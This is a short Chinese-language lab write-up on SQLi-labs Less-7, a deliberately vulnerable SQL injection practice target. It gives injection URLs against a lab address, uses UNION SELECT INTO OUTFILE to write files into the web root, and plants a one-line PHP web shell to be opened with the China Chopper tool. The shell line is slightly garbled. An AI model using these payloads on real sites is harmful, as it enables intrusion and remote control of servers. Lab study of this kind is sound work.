本文记录 SQL 注入的学习过程,资料为 SQLi-labs
Less - 07: GET - Dump into outfile - String
测试漏洞
本关我们利用文件导入的方式进行注入
URL 中输入 ‘)) or 1=1–+
源代码中
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
这里对 id 参数进行了 ‘)) 的处理。所以我们其实可以尝试 ‘)) or 1=1–+进行注入
http://10.10.10.137/sqli-labs/Less-7/?id=1')) or 1=1--+
http://10.10.10.137/sqli-labs/Less-7/?id=-1')) UNION SELECT 1,2,3 into outfile "/var/www/sqli-labs/Less-7/uuu.txt"--+
上图中显示 sql 出错了,但是没有关系,我们可以在文件中看到 uuu.txt 已经生成了。
我们可以直接将一句话木马导入进去
http://10.10.10.137/sqli-labs/Less-7/?id=1'))UNION SELECT 1,2,'<?php @eval($_post[?mima?])?>' into outfile "/var/www/sqli-labs/Less-7/yijuhua.php"--
可以使用菜刀连接木马